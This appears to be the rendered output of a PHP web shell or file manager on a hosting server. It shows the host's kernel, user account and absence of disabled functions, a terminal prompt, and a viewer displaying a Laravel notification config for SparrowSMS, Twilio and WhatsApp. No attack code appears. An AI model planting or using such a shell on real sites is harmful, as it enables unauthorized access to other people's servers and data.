🚀 Hostinger Optimized
🖥️ Server: LiteSpeed
💻 System: Linux s20058.bom1.stableserver.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
👤 User: skhata (1324)
🐘 PHP: 8.4.20
🚫 Disabled: ✨ NONE

💻 Terminal

📁 /home/skhata/chandrasons.com/public
$

📄 notification.php

📁 Path: //home7/skhata/new.chandrapharma.com/config/notification.php
📊 Size: 1.23 KB
🔒 Perm: 0644
📝 MIME: text/x-php
<?php

return [
    /*
    |--------------------------------------------------------------------------
    | SparrowSMS — Nepal domestic SMS
    |--------------------------------------------------------------------------
    */
    'sparrow' => [
        // Support both key variants in .env (SPARROWSMS_TOKEN or SPARROW_SMS_TOKEN)
        'token' => env('SPARROWSMS_TOKEN', env('SPARROW_SMS_TOKEN')),
        'from'  => env('SPARROWSMS_FROM', env('SPARROW_SMS_FROM', 'STPStore')),
    ],

    /*
    |--------------------------------------------------------------------------
    | Twilio — India + International SMS
    |--------------------------------------------------------------------------
    */
    'twilio' => [
        'sid'        => env('TWILIO_SID'),
        'auth_token' => env('TWILIO_AUTH_TOKEN'),
        'from'       => env('TWILIO_FROM'),   // E.164 e.g. +1234567890
    ],

    /*
    |--------------------------------------------------------------------------
    | WhatsApp Business API (Meta Cloud API)
    |--------------------------------------------------------------------------
    */
    'whatsapp' => [
        'token'           => env('WHATSAPP_TOKEN'),
        'phone_number_id' => env('WHATSAPP_PHONE_NUMBER_ID'),
    ],
];
← Back📥 Raw✏️ Edit🔒 Chmod
✨ File Manager Magic ✨